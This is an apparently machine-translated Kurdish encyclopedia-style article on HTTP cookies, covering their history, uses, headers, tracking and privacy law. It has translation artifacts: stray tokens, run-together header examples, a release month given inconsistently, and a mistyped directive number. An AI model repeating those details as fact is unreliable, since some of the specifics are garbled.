in definitions, wiki

Cookie Înternetê: Ew çi ye? Pênase, Origins, Cure û Nepenî

Rola kuxikê çi ye, çi ye û cureyên çerezan çi ne? 🍪

56.3k Views 384 votes

Cookie Înternetê: Ew çi ye? Pênase, Origins, Cure û Nepenî
Cookie Înternetê: Ew çi ye? Pênase, Origins, Cure û Nepenî

Un cookie an web cookie (an jî cookie, bi kurtî wekî şahîd li Quebec) ji hêla protokola ragihandinê ya HTTP ve wekî rêzek agahdariya ku ji hêla serverek HTTP ve ji xerîdarek HTTP re hatî şandin, ku ya paşîn her carê ku heman servera HTTP di bin hin mercan de tê pirsîn vedigere, tê destnîşankirin.

Kuxik hevwateya a ye pelê nivîsê ya piçûk li ser termînalê hatî hilanîn ya bikarhênerê Înternetê. Zêdetirî 20 sal in, ew rê didin pêşdebirên malperê ku daneyên bikarhêner hilînin da ku navîgasyona xwe hêsantir bikin û destûr bidin hin fonksiyonan. Cookies her gav kêm-zêde nakokî bûne ji ber ku ew agahdariya kesane ya mayî dihewîne ku potansiyel dikare ji hêla aliyên sêyemîn ve were bikar anîn.

Ew wekî sernavek HTTP ji hêla servera malperê ve ji geroka webê re tê şandin, ku her gava ku ew digihîje serverê, wê neguhêrbar vedigerîne. A cookie dikare were bikaranîn erêkirinek, danişînek (parastina dewletê), û ji bo agahdariya taybetî di derbarê bikarhêner de hilînin, wek tercîhên malperê an naveroka selikek kirîna elektronîkî. Peyva kuxikê jê hatiye girtin cookie efsûnî, têgehek naskirî ya di hesabkirina UNIX de, ku fikir û navê cookiesên gerokê îlham girtiye. Çend alternatîfên cookie hene, her yek bi karanîna xwe, avantaj û dezawantajên xwe hene.

Ji ber ku pelên nivîsê yên hêsan in, çerez nayên darvekirin. Ew ne ne sîxur û ne jî vîrus, her çend çerezên hin malperan ji hêla gelek nermalava antî-vîrûsê ve têne tespît kirin ji ber ku ew dihêle ku bikarhêner dema ku serdana gelek malperan dikin werin şopandin. 

Pir gerokên nûjen destûrê didin bikarhêneran biryar bidin ka hûn cookies qebûl bikin an red bikin. Bikarhêner jî dikarin hilbijêre ka çiqas cookies têne hilanîn. Lêbelê, bi tevahî redkirina cookie-yan hin malperan nekarbar dike. Mînakî, selikên kirrûbirrê an malperên ku hewceyê têketinê bi karanîna pêbaweriyan (navê bikarhêner û şîfreyê) hilînin.

Tabloya naverokê

historique

Term cookie ji peyva îngilîzî tê cookie efsûnî, ku pakêtek daneyan e ku bername distîne û neguherî vedigerîne. Dema ku cookies berê di IT-ê de hatine bikar anîn Lou Montulli fikra wan hebû ku wan di danûstandinên webê de bikar bîne di 1994'ê de Di wê demê de, ew ji hêla Netscape Communications ve hatî xebitandin, ku ji bo xerîdarek serîlêdana e-bazirganiyê çêkiribû. Cookies ji pirsgirêka pêbaweriya pêkanîna selika kirîna virtual ya firotgehek re çareseriyek da.

John Giannandrea û Lou Montulli di heman salê de yekem taybetmendiya cookie ya Netscape nivîsand. Guhertoya 0.9 beta ya Mosaic Netscape, di 13ê çileya pêşîna (October) 1994ê de hat berdan, yekbûyî teknolojiya cookie (postê bibînin). Bikaranîna yekem (ne-ceribandinî) ya çerezan ev bû ku diyar bikin ka mêvanên malpera Netscape berê berê xwe dane malperê. Montulli di sala 1995-an de ji bo teknolojiya cookie serlêdana patentê kir, û patenta DY 5774670 hate dayîn. di sala 1998 de hatiye dayîn.

Piştî ku di 0.9-an de di Netscape 1994 beta de hate bicîh kirin, cookies di Internet Explorer 2-ê de, ku di Cotmeha 1995-an de hate berdan, hatin yek kirin.

Danasîna çerezan hêj ji raya giştî re bi berfirehî nehatiye zanîn. Bi taybetî, cookies ji hêla xwerû ve di mîhengên gerokê de hatin pejirandin, û bikarhêner ji hebûna wan nehatin agahdar kirin. Hin kes di çaryeka yekem a sala 1995-an de haya wan ji hebûna cookie-yan hebû, lê raya giştî tenê piştî ku Financial Times gotarek di 12ê Sibata 1996-an de weşand. Di heman salê de, cookie gelek bala medyayê kişand. ji ber destwerdanên nepenîtiyê yên gengaz. Mijara cookies di du şêwirdariyên Komîsyona Bazirganiya Federal a Amerîkî di 1996 û 1997 de hate nîqaş kirin.

Pêşveçûna taybetmendiya cookie ya fermî jixwe dest pê bû. Nîqaşên yekem ên taybetmendiya fermî di Nîsana 1995-an de li ser navnîşa posta www-talk pêk hat. Komeke taybet a xebatê ya IETF hate avakirin. Du pêşniyarên alternatîf ji bo danasîna dewletê bi danûstendinên HTTP ve ji hêla Brian Behlendorf û David Kristol ve hatin pêşniyar kirin, lê komê, bi serokatiya Kristol bixwe, biryar da ku taybetmendiya Netscape-ê wekî xala destpêkê bikar bîne. Di Sibata 1996-an de, koma xebatê destnîşan kir ku çerezên partiya sêyemîn ji bo nepenîtiyê xetereyek girîng in. Taybetmendiya ku ji hêla komê ve hatî hilberandin di dawiyê de wekî hate weşandin RFC 2109.

Ji dawiya sala 2014-an pê ve, em li ser gelek malperan pankartek li ser cookies dibînin. Bi kêmanî yek dirêjkirina gerokê heye ku destûrê dide pankart nayê nîşandan.

Cureyên Cookies û Bikaranîna

Rêveberiya rûniştinê

Cookies dikarin werin bikar anîn da ku daneyên bikarhêner di dema navîgasyonê de biparêzin, lê di heman demê de di serdanên pirjimar de jî. Cookies ji bo peydakirina navgînek ji bo bicihanîna selikên kirrûbirra elektronîkî, amûrek virtual ku tê de bikarhêner dikare tiştên ku dixwaze bikire dema ku li malperê digere berhev bike, hatin destnîşan kirin.

Van rojan, sepanên mîna selikên kirrûbirrê li şûna navnîşa tiştan di databasek de li ser serverek hilînin, ya ku tercîh e; ji tomarkirina wan di kuxikê bixwe de. Pêşkêşkara malperê çerezek ku tê de nasnameyek danişîna yekta tê de dişîne. Dûv re geroka webê li ser her daxwazek paşîn vê nasnameya danişînê vedigerîne û tiştên di selikê de têne hilanîn û bi heman nasnama danişînê ya bêhempa ve têne girêdan.

Bikaranîna pircar a cookie-yan ji bo têketina malperek bi karanîna pêbaweriyan bikêr e. Bi kurtasî, servera webê pêşî cookieyek ku tê de nasnameyek danişîna yekta tê de dişîne. Dûv re bikarhêner pêbaweriyên xwe (bi gelemperî navek bikarhêner û şîfreyek) peyda dikin. Dûv re serîlêdana malperê danişînê rast dike û destûrê dide bikarhêner ku bigihîje karûbarê.

personalization

Cookies dikarin ji bo bîranîna agahdariya li ser bikarhênerê malperek bikar bînin, da ku di pêşerojê de naveroka guncan nîşanî wî bidin. Mînakî, serverek malperê dikare cookieyek ku tê de navê bikarhênerê ya paşîn a ku ji bo têketina wê malperê hatî bikar anîn vedihewîne, da ku navê bikarhêner li ser serdanên paşerojê pêş de were tije kirin.

Gelek malper li ser bingeha tercîhên bikarhêner ji bo kesanekirina cookies bikar tînin. Bikarhêner tercîhên xwe bi formek hilbijêrin û van pêşkêşî serverê bikin. Pêşkêşkar tercihên di cookieyekê de şîfre dike û ji gerokê re dişîne. Dûv re, her gava ku bikarhêner digihîje rûpelek vê malperê, gerok cookie-yê vedigerîne û ji ber vê yekê navnîşa vebijarkan vedigerîne; Dûv re server dikare rûpelê li gorî tercîhên bikarhêner xweş bike. Mînakî, malpera Wikipedia destûrê dide bikarhênerên xwe ku çermê malpera ku tercîh dikin hilbijêrin. Motora lêgerînê ya Google destûrê dide bikarhênerên xwe (tevî ku ew ne qeydkirî ne) ku hejmara encamên ku dixwazin li ser her rûpelê encamê bibînin hilbijêrin.

Şopandin

Cookieyên şopandinê ji bo şopandina adetên geroka bikarhênerên înternetê têne bikar anîn. Ev jî dikare beşek bi karanîna navnîşana IP-ya komputerê ku ji bo rûpelek daxwazek dike an jî bi karanîna sernavê HTTP-ya 'referrer' ku xerîdar bi her daxwazê ​​re dişîne, were kirin, lê cookies rê dide rastiyek mezintir. Ev dikare wekî mînaka jêrîn were kirin:

  1. Ger bikarhêner rûpelek li ser malperek gazî bike, û daxwazî ​​cookie tune, server texmîn dike ku ev rûpela yekem e ku ji hêla bikarhêner ve hatî ziyaret kirin. Dûv re server rêzek bêserûber diafirîne û bi rûpela daxwazkirî re ji gerokê re dişîne.
  2. Ji vê gavê ve, her gava ku rûpelek nû ya malperê tê gazî kirin, cookie dê bixweber ji hêla gerokê ve were şandin. Pêşkêşker dê rûpelê wekî gelemperî bişîne, lê di heman demê de dê URL-ya rûpelê ku jê re tê gotin, tarîx, dema daxwazê ​​û cookie-yê jî di pelek têketinê de tomar bike.

Bi dîtina pelê têketinê, wê hingê gengaz e ku meriv bibîne ku bikarhêner kîjan rûpelan ziyaret kiriye û bi çi rêzê. Mînakî, heke di pelê de çend daxwazên ku bi karanîna cookie id=abc hatine çêkirin hebin, ev dikare destnîşan bike ku ev hemî daxwaz ji heman bikarhênerê têne. URL-ya tê xwestin, tarîx û demjimêra ku bi daxwazan ve girêdayî ye dihêle ku geroka bikarhêner were şopandin.

Cookie-partiya sêyem û beaconên malperê, yên ku li jêr hatine ravekirin, di heman demê de şopandina li ser malperên cihêreng çalak dikin. Şopandina malpera yekane bi gelemperî ji bo armancên statîstîkî tê bikar anîn. Berevajî vê, şopandina li ser malperên cihêreng ên ku bi karanîna cookie-yên partiya sêyemîn bi gelemperî ji hêla pargîdaniyên reklamê ve têne bikar anîn da ku profîlên bikarhêner ên nenas hilberînin (yên ku paşê têne bikar anîn da ku diyar bikin ka kîjan reklam divê ji bikarhêner re were destnîşan kirin û her weha ji bo şandina e-nameyên ku bi van reklaman re têkildar in - SPAM ).

Cookieyên şopandinê metirsiya destdirêjiya nepeniya bikarhêner e lê ew dikarin bi hêsanî werin jêbirin. Piraniya gerokên nûjen vebijarkek vedigirin ku dema girtina serîlêdanê bixweber çerezên domdar jêbirin.

Cookies partiya sêyemîn

Wêne û tiştên din ên ku di rûpelek malperê de cih digirin dibe ku li ser pêşkêşkerên ku ji ya ku rûpelê mêvandar dike cihêreng bimînin. Ji bo nîşankirina rûpelê, gerok van tiştan hemî dakêşîne. Piraniya malperan agahdariya ji çavkaniyên cihêreng hene. Mînakî, heke hûn www.example.com di geroka xwe de binivîsin, dê bi gelemperî li ser beşek rûpelê tiştên ku ji çavkaniyên cihê, ango ji domainek cûda ji www. .example.com werin, hebin. Cookiyên partiya "Yekemîn" ew çerez in ku ji hêla domaina ku di barika navnîşana gerokê de hatî navnîş kirin têne danîn. Kokiyên partiya sêyemîn ji hêla yek ji tiştên rûpelê ku ji domainek cûda tê ve têne saz kirin.

Bi xwerû, gerokên mîna Mozilla Firefox, Microsoft Internet Explorer û Opera çerezên sêyemîn qebûl dikin, lê bikarhêner dikarin mîhengên vebijarkên gerokê biguhezînin da ku wan asteng bikin. Xetereya ewlehiyê di çerezên sêyemîn ên ku fonksiyona malperê çalak dike de tune ye, di heman demê de ew ji bo şopandina bikarhêneran jî têne bikar anîn. ji malperê bi malperê.

Amûrên wekî Ghostery ji bo hemî gerokên ku di nav wan de Google Chrome hene, dikarin danûstandinên di navbera aliyên sêyemîn de asteng bikin.

Pêkanîna

Têkiliyek gengaz a di navbera gerokek webê û servera ku malpera malperê digire. Pêşkêşkar cookieyekê ji gerokê re dişîne û gerok gava ku gazî rûpelek din dike, wê paşde dişîne.
Têkiliyek gengaz a di navbera gerokek webê û servera ku malpera malperê digire. Pêşkêşkar cookieyekê ji gerokê re dişîne û gerok gava ku gazî rûpelek din dike, wê paşde dişîne.

Cookies perçeyên piçûk ên daneyê ne ku ji hêla servera malperê ve ji gerokê re têne şandin. Gerok wan neguhêrbar vedigerîne serverê, rewşa (bîra bûyerên paşîn) di nav danûstendina HTTP ya bêdewlet de vedigire. Bêyî çerezan, her vegerandina rûpelek malperê an pêkhateyek ji rûpelek malperê bûyerek veqetandî ye, ji daxwazên din ên ku ji heman malperê re têne kirin serbixwe. Digel ku karibe ji hêla servera malperê ve were saz kirin, heke ji hêla gerokê ve were piştgirî kirin û destûr were dayîn, cookies dikarin bi zimanên nivîsandinê yên wekî JavaScript jî bêne saz kirin.

Taybetmendiya cookie-ya fermî pêşniyar dike ku gerok divê karibin hejmareke hindiktirîn çerezan hilînin û ji nû ve bişînin. Bi taybetî, gerokek divê bikaribe herî kêm 300 çerezên ji çar kîlobyte her yek, û herî kêm 20 cookie ji bo serverek an domainek yekane hilîne.

Li gorî beşa 3.1 ya RFC 2965, navên cookie-yê nehesas in.

Kukek dikare dîroka bidawîbûna xwe diyar bike, di vê rewşê de cookie dê di vê tarîxê de were jêbirin. Ger cookie tarîxek qedandinê diyar neke, gava ku bikarhêner ji geroka xwe derkeve cookie tê jêbirin. Ji ber vê yekê, destnîşankirina tarîxek qedandinê rêyek e ku meriv cookie bi gelek danişînan bijî. Ji bo vê yekê, çerezên bi tarîxek qedandinê têne gotin berdewame. Serlêdanek nimûne: malperek firotanê dibe ku cookie-yên domdar bikar bîne da ku tiştên ku bikarhêneran di selika xweya kirrûbirrê de bi cîh kirine tomar bike (di rastiyê de, kuokî dibe ku navnîşek ku di databasek li ser malpera firotanê de hatî tomar kirin, û ne di komputera we de, vebêje) . Bi vê wateyê, ger bikarhêner bêyî kirînê geroka xwe bihêlin û paşê vegerin wê, ew ê karibin dîsa tiştên di selikê de bibînin. Ger van çerezan tarîxek qedandinê nedana, dema gerok were girtin dê biqede, û agahdariya li ser naveroka selikê winda bibe.

Cookies dikarin di çarçovê de bi domanek taybetî, subdomain an rêyek li ser servera ku wan afirandiye ve were sînorkirin.

Veguheztina rûpelên malperê bi karanîna Protokola Veguheztina HyperText (HTTP) tê kirin. Bi paşguhkirina çerezan, gerok ji pêşkêşkerên malperê bangî rûpelek dikin û bi gelemperî ji wan re nivîsek kurt a ku jê re tê gotin dişînin Daxwaza HTTP. Mînakî, ji bo gihîştina rûpela www.example.org/index.html, gerok bi servera www.example.org ve girêdidin û daxwazek bi vî rengî dişînin:

GET /index.html HTTP/1.1Host: www.example.org
navigatorhodiť

Pêşkêşkar bi şandina rûpela daxwazkirî bersivê dide, ku berî nivîsek bi heman rengî, tev tê gotin Bersiva HTTP. Dibe ku ev pakêt xêzên ku rêwerzan dide gerokê ku cookies hilîne hebe:

HTTP/1.1 200 OKCûreya naverokê: nivîs/htmlSet-Cookie: nav=nirx
(rûpela HTML)
navigatorhodiť

Pêşkêşkar tenê xeta Set-Cookie dişîne, ger server bixwaze gerokek cookie hilîne. Set-Cookie ji bo gerokê daxwazek e ku navnîşa nav = nirxê hilîne û di hemî daxwazên pêşerojê de li pêşkêşkarê vegerîne. Ger gerok pişgiriya çerezan bike û çerez di vebijarkên gerokê de werin çalak kirin, dê cookie di hemî daxwazên paşîn ên ku ji heman serverê re têne kirin de cîh bigire. Mînakî, gerok bangî rûpela www.example.org/news.html dike bi şandina daxwaza jêrîn ji serverê www.example.org re:

GET /news.html HTTP/1.1Host: www.example.orgCookie: name=valueQebûl: */*
navigatorhodiť

Ev daxwazek ji bo rûpelek din e ji heman serverê, û ji ya yekem a li jor cuda ye ji ber ku ew rêzek ku server berê ji gerokê re şandibû dihewîne. Bi saya vê wateyê, server dizane ku ev daxwaz bi ya berê ve girêdayî ye. Pêşkêşker bi şandina rûpela tê gotin, û hem jî bi lêzêdekirina çerezên din li wê bersivê dide.

Nirxa cookie dikare ji hêla serverê ve bi şandina xêzek nû Set-Cookie: name=new_value di bersiva rûpela tê gotin de were guheztin. Dûv re gerok nirxa kevn bi ya nû diguhezîne.

Rêza Set-Cookie bi gelemperî ji hêla bernameyek CGI an zimanek din a nivîsandinê ve, ne ji hêla servera HTTP ve tê afirandin. Pêşkêşkara HTTP (mînak: Apache) dê tenê encama bernameyê (belgeyek ku berî serê serê xwe çerezan vedihewîne) ji gerokê re bişîne.

Cookies dikarin ji hêla JavaScript an jî zimanên din ên mîna ku di gerokê de têne xebitandin, ango li ser milê xerîdar ne ji hêla serverê ve bêne danîn. Di JavaScriptê de ji bo vê armancê tişta document.cookie tê bikaranîn. Mînakî, daxuyaniya document.cookie = "germ=20" bi navê "germ" û bi nirxa 20 cookieyekê çêdike.

Mînaka bersivek HTTP ji google.com, ku cookieyek bi taybetmendiyan destnîşan dike.
Mînaka bersivek HTTP ji google.com, ku cookieyek bi taybetmendiyan destnîşan dike.

Ji bilî cotek nav/nirx, cookie dikare tarîxek qedandinê, rêyek, navek domain û celebê pêwendiya ku hatî armanc kirin jî hebe, ango normal an şîfrekirî. RFC 2965 di heman demê de diyar dike ku cookie divê xwedî jimareyek guhertoya mecbûrî be, lê ev bi gelemperî tê derxistin. Van beşên daneyê li pey cotê name=new_value dimeşin û bi nîvkolonan têne veqetandin. Mînakî, cookie dikare ji hêla serverê ve bi şandina rêzek Set-Cookie were afirandin: name=new_value; qediya=date; rê =/; domain=.example.org.

Cookies diqedin û paşê ji hêla gerokê ve ji serverê re di rewşên jêrîn de nayê şandin:

  • Dema ku gerok girtî ye, heke kuk ne berdewam be.
  • Dema ku dîroka qedandina cookie derbas bû.
  • Dema ku tarîxa qedandina cookie-yê (ji hêla server an jî skrîptê ve) bi tarîxek berê were guheztin.
  • Dema ku gerok li ser daxwaza bikarhêner cookie jêbirin.

Rewşa sêyem destûrê dide pêşkêşker an nivîsan ku bi eşkere cookieyekê jêbirin. Bala xwe bidinê ku bi geroka webê ya Google Chrome re gengaz e ku hûn bi gihîştina mîhengên naverokê dîroka qedandina cookieyek taybetî bizanibin. Kukîyek ku li ser komputerê hatî tomar kirin pir baş dibe ku çend dehsalan li wir bimîne heke ji bo jêbirina wê prosedurek neyê girtin.

Stereotypes

Ji dema danasîna wan li ser Înternetê, gelek ramanên li ser cookies li ser Înternetê û di medyayê de belav bûne. Di sala 1998-an de, CIAC, tîmek şopandina bûyera komputerê ya Wezareta Enerjiyê ya Dewletên Yekbûyî, diyar kir ku qelsiyên ewlehiya cookie "bi bingehîn tune" û diyar kir ku "agahiyên li ser eslê serdanên we û hûrguliyên rûpelên malperê yên ku we serdana wan kiriye." jixwe di pelên têketinê yên pêşkêşkerên malperê de hene. Di sala 2005 de, Jupiter Research encamên lêkolînek weşand, ku tê de rêjeyek girîng a bersivdaran gotinên jêrîn fikirîn:

  • Cookies wek vîrûs, ew dîskên hişk ên bikarhêneran vedişêrin.
  • Cookies çêdikin Daxwazker.
  • Cookies ji bo şandinê têne bikar anîn spam.
  • Cookies tenê ji bo reklamê têne bikar anîn.

Cookies nikarin agahdariya ji komputera bikarhêner jêbirin an bixwînin. Lêbelê, cookies îmkana tesbîtkirina rûpelên malperê yên ku ji hêla bikarhênerek ve hatî serdan kirin li ser malperek an komek malperan destnîşan dikin. Ev agahdarî dikare di profîlek bikarhênerê de were berhev kirin ku dikare were bikar anîn an ji aliyên sêyemîn re were firotin, ku dikare pirsgirêkên cidî yên nepenîtiyê derxe holê. Hin profîl nenas in, di vê wateyê de ku ew agahdariya kesane tune ne, di heman demê de profîlên weha jî dikarin gumanbar bin.

Li gorî heman lêkolînê, rêjeyek mezin ji bikarhênerên înternetê nizanin çawa cookies jêbirin. Yek ji sedemên ku mirov ji cookie-yan bawer nakin ev e ku hin malperan aliyekê nasnameya kesane ya cookie-yan îstismar kirine û vê agahiyê bi çavkaniyên din re parve kirine. Rêjeyek mezin a reklamên armanckirî û e-nameyên nexwestî, ku spam têne hesibandin, ji agahdariya ku ji şopandina cookies têne berhev kirin tê.

Mîhengên gerokê

Piraniya gerokan piştgirî didin cookies û destûrê didin bikarhêner ku wan neçalak bike. Vebijarkên herî gelemperî ev in:

  • Cookies bi tevahî çalak bikin an neçalak bikin, da ku ew bi berdewamî werin pejirandin an asteng kirin.
  • Bi ketina javascript: alert(document.cookie) di barika navnîşana gerokê de, destûrê bide bikarhêner ku di rûpelek diyarkirî de cookies çalak bibîne. Hin gerok ji bo bikarhênerê ku dikare çerezên ku niha ji hêla gerokê ve hatine hilanîn binêre û bi bijartî jêbibe rêvebirek cookie-yê vedihewîne.

Piraniya gerokan di heman demê de destûr didin ku daneyên kesane yên ku di nav wan de çerezan jî hene werin jêbirin. Modulên din ên ji bo kontrolkirina destûrên cookie-yê jî hene.

Nepenî û Cookies-Third-Party

Di vê mînaka xeyalî de, pargîdaniyek reklamê li du malperan pankart danîne. Bi mazûvaniya pankartan li ser serverên xwe û bi karanîna cookie-yên partiya sêyemîn, pargîdaniya reklamê kare navîgasyona bikarhêner bi van her du malperan bişopîne.

Cookies ji bo nepenîbûn û nenasîna bikarhênerên malperê xwedî bandorên girîng in. Her çend cookie tenê ji servera ku wan saz kiriye an ji serverek ku aîdî heman domaina Înternetê ye vegere têne şandin, lêbelê dibe ku rûpelek malperê wêneyan an pêkhateyên din ên ku li ser pêşkêşkerên ku aîdî domainên din in hatine hilanîn hebin. Ji çerezên ku di dema rakirina van hêmanên derveyî de têne danîn têne gotin çerezên partiya sêyemîn. Di nav de çerezên ji paceyên pop-up ên nedilxwaz hene.

Pargîdaniyên reklamê çerezên partiya sêyemîn bikar tînin da ku bikarhêneran li ser malperên cihê yên ku ew serdana wan bişopînin. Bi taybetî, pargîdaniyek reklamê dikare bikarhênerek li hemî rûpelên ku wêneyên reklamê an pixelek şopandinê danîne bişopîne. Zanîna rûpelên ku ji hêla bikarhêner ve têne serdan rê dide pargîdaniya reklamê ku tercîhên reklamê yên bikarhêner bike hedef.

Kapasîteya avakirina profîla bikarhêner ji hêla hin kesan ve wekî dagirkeriyek nepenîtiyê tê hesibandin, nemaze dema ku şopandin li ser domên cihêreng bi karanîna çerezên partiya sêyemîn tê kirin. Ji bo vê yekê, hin welatan qanûnên cookie hene.

Hikûmeta Dewletên Yekbûyî di sala 2000-an de rêgezên hişk li ser danîna cookie-yan pêk anî, piştî ku hate eşkere kirin ku Ofîsa Siyaseta Dermanên Qesra Spî cookies bikar tîne da ku komputerên bikarhênerên ku reklamên dermanên serhêl temaşe dikin bişopîne. Di sala 2002 de, çalakvanê nepenîtiyê Daniel Brandt vedîtibû ku CIA li ser komputerên ku serdana malperên wê kiribûn, çerezên domdar hiştin. Piştî ku CIA ji vê binpêkirinê agahdar bû, daxuyand ku ev cookie bi mebest nehatine şandin û dev ji danîna wan berda. Di 25ê Kanûna Pêşîn, 2005 de, Brandt kifş kir ku Ajansa Ewlekariya Neteweyî (NSA) ji ber nûvekirina nermalavê du çerezên domdar li ser komputerên mêvanan hiştine. Piştî ku hate agahdar kirin, NSA tavilê cookies neçalak kir.

Li Keyaniya Yekbûyî, ya qanûna cookie ", ku di 25ê Gulana 2012an de ket meriyetê, malperan mecbûr dike ku niyeta xwe eşkere bikin, bi vî rengî rê dide bikarhêneran ku hilbijêrin ka ew dixwazin şopên derbasbûna xwe li ser înternetê bihêlin an na. Bi vî rengî ew dikarin ji armanca reklamê werin parastin. Lebê, ligor The Guardian, razîbûna bikarhênerên Înternetê ne hewce ne diyar e; guherandinên di şert û mercên razîbûna bikarhêner de hatine çêkirin, çêkirin bi vî awayî tê wateya.

Rêbernameya 2002/58 li ser nepenîtiyê

Rêziknameya 202/58 nepenî û ragihandina elektronîkî, qaîdeyên li ser karanîna cookies dihewîne. Bi taybetî, xala 5, paragrafa 3 ya vê rêwerzê hewce dike ku hilanîna daneyan (wek cookies) di komputera bikarhêner de tenê dikare were kirin heke:

  • bikarhêner agahdar e ku çawa dane tê bikar anîn;
  • Ji bikarhêner re vebijarka redkirina vê operasyona hilanînê tê dayîn. Lêbelê, ev gotar jî dibêje ku hilanîna daneyan ji ber sedemên teknîkî ji vê qanûnê dûr e.

Ji ber ku ji Cotmeha 2003-an vir ve bihata cîbicîkirin, lêbelê li gorî raporek Kanûn 2004-an, rêwerz bi rengek pir nekêmasî hate pratîkê, ku her weha destnîşan kir ku hin Dewletên Endam (Slovakya, Letonya, Yewnanîstan, Belçîka û Luksemburg) hîna veguhezandine. dîrektîfa nav hiqûqa navxweyî.

Li gorî nêrîna G29 di sala 2010 de, ev rêwerz, ku bi taybetî karanîna cookie-yan ji bo armancên reklama behre şert dike, li ser razîbûna eşkere ya bikarhênerê Înternetê pir kêm tê sepandin. Bi rastî, pir malperan wiya bi rengekî ku li gorî rêwerzan tevnagerin, bi sînordarkirina xwe bi "banner"ek hêsan a ku agahdariya karanîna "cookies" dide, bêyî ku agahdariya li ser karanînan bidin, bêyî ku cûdahiyek di navbera cookiesên "teknîkî" de bikin, dikin. çerezên "şopandinê", ne jî bijarteyek rast pêşkêşî bikarhênerê dike ku dixwaze çerezên teknîkî biparêze (wek çerezên rêveberiya selika kirînê) û "şopandina" cookie red bike. Di rastiyê de, gelek malper rast naxebitin ger cookies bêne red kirin, ku li gorî rêwerznameya 2002/58 an rêwerznameya 95/46 (Parastina daneyên kesane) tevnagere.

Rêbernameya 2009/136/CE

Ev materyal ji hêla Rêbernameya 2009/136/EC ya 25ê çiriya paşîna (November) 2009-an ve hatî nûve kirin ku dibêje ku "depokirina agahdariyê, an bidestxistina agahdariya ku berê hatî hilanîn, di alavên termînalê de aboneyek an bikarhênerek tenê bi şertê destûr tê dayîn ku aboner an bikarhêner razîbûna xwe daye, piştî ku li gorî Rêbernameya 95/46/EC agahdariya zelal û bêkêmasî di navbera kesên din de li ser mebestên pêvajoyê wergirtiye. Ji ber vê yekê dîrektîfa nû berpirsiyariyên berî danîna cookies li ser komputera bikarhênerê Înternetê xurt dike.

Di nihêrînên pêşîn ên rêwerzanê de, qanûndanerê Ewropî diyar dike lêbelê: "Gava ku ji hêla teknîkî ve gengaz û bandor be, li gorî bendên têkildar ên Rêbernameya 95/46/EC, razîbûna bikarhêner di derbarê pêvajoyê de dikare bi riya bikaranîna mîhengên guncan ên gerokek an serîlêdana din." Lê di rastiyê de, tu gerokek heya îro ne mumkun e ku meriv cookie-yên teknîkî yên bingehîn ji yên vebijarkî yên ku divê ji bijartina bikarhêner re were hiştin veqetîne.

Ev dîrektîfa nû di Tîrmeha 2012an de ji aliyê parlementerên Belçîkayê ve hat veguheztin. Lêkolînek sala 2014an nîşan dide ku tewra parlamenter jî ji bo serlêdanê têdikoşin. astengên dîrektîfê.

P3P

Taybetmendiya P3P şiyana serverek heye ku polîtîkayek nepenîtiyê diyar bike, ku diyar dike ka ew çi celeb agahdarî berhev dike û ji bo çi armancê. Van polîtîkayan karanîna agahdariya ku bi karanîna cookies hatî berhev kirin (lê ne bi sînorkirî ne) vedihewîne. Li gorî pênaseyên P3P, gerokek dikare bi berhevkirina polîtîkayên nepenîtiyê bi vebijarkên bikarhêner re an jî bi pirskirina bikarhêner, pêşkêşkirina daxuyaniya nepenîtiyê ya ku ji hêla serverê ve hatî ragihandin, cookies qebûl bike an red bike.

Gelek gerok, di nav de Apple Safari û Microsoft Internet Explorer guhertoyên 6 û 7, P3P piştgirî dikin ku destûrê dide gerokê ku diyar bike ka hilanîna cookie-ya partiya sêyemîn qebûl dike. Geroka Opera destûrê dide bikarhêneran ku cookie-yên sêyemîn red bikin û ji bo domên Înternetê profîlek ewlehiyê ya gerdûnî û taybetî biafirînin. Mozilla Firefox guhertoya 2 piştgiriya P3P berda lê ew di guhertoya 3-ê de ji nû ve saz kir.

Kukiyên partiya sêyemîn ji hêla pir gerokan ve têne asteng kirin da ku nepenîtiyê zêde bikin û şopandina reklamê kêm bikin, bêyî ku bandorek neyînî li ser ezmûna webê ya bikarhêner bike. Gelek ajansên reklamê vebijarkek pêşkêş dikin terikandin ji reklama armanckirî re, bi sazkirina cookieyek gelemperî di gerokê de ku vê armancê neçalak dike, lê çareseriyek wusa bi pratîkî ne bandorker e, dema ku rêz jê re were girtin, ji ber ku gava ku bikarhêner van çerezan jêbirin ku vebijarkê betal dike, ev cookie ya gelemperî tê jêbirin. biryar derket.

Dezawantajên cookies

Ji bilî pirsgirêkên nepenîtiyê, cookies hin kêmasiyên teknîkî jî hene. Bi taybetî, ew her gav bikarhêneran rast nas nakin, ew dikarin performansa malperê hêdî bikin dema ku hejmareke mezin bin, ew dikarin ji bo êrîşên ewlehiyê werin bikar anîn, û ew bi veguheztina dewleta nûner, şêwaza mîmarî ya nermalavê re nakokî.

Nasnameya nerast

Ger li ser komputerek ji yek gerokek bêtir were bikar anîn, di her yek ji wan de her gav yekîneyek hilanînê ya cihê ji bo cookies heye. Ji ber vê yekê cookies ne kesek nas dikin, lê berhevoka hesabek bikarhêner, komputerek û gerokek malperê ye. Ji ber vê yekê, her kes dikare van hesab, komputer, an gerokên ku xwedan peldanka cookie-yê ne bikar bîne. Bi heman rengî, çerezan di navbera pir bikarhênerên ku heman hesabê bikarhêner, komputer û gerokê parve dikin, wek mînak li "kafeyên înternetê" an cîhek ku belaş gihandina çavkaniyên komputerê dide, cûda nakin.

Lê di pratîkê de ev gotin di pirraniya bûyeran de şaş derdikeve, ji ber ku îro komputerek "şexsî" (an smartphone, an jî tablet, ku xirabtir e) bi giranî ji hêla kesek ve tê bikar anîn. Ev tê wateya armancgirtina kesek taybetî û di nav hejmûna agahdariya berhevkirî de digihîjin armancek kesane, her çend kes "bi nav" neyê nas kirin.

Kukiyek dikare ji hêla komputerek din a li ser torê ve were dizîn.

Di dema xebata normal de, cookies di navbera server (an komek pêşkêşkerên di heman domainê de) û geroka komputera bikarhêner ve têne şandin. Ji ber ku cookie dikare agahdariya hesas hebe (navê bikarhêner, şîfreyek ku ji bo verastkirinê tê bikar anîn, hwd.), divê nirxên wan ji komputerên din re negihîjin. Diziya cookie çalakiyek desteserkirina cookie-yan ji hêla partiyek sêyemîn a bêdestûr e.

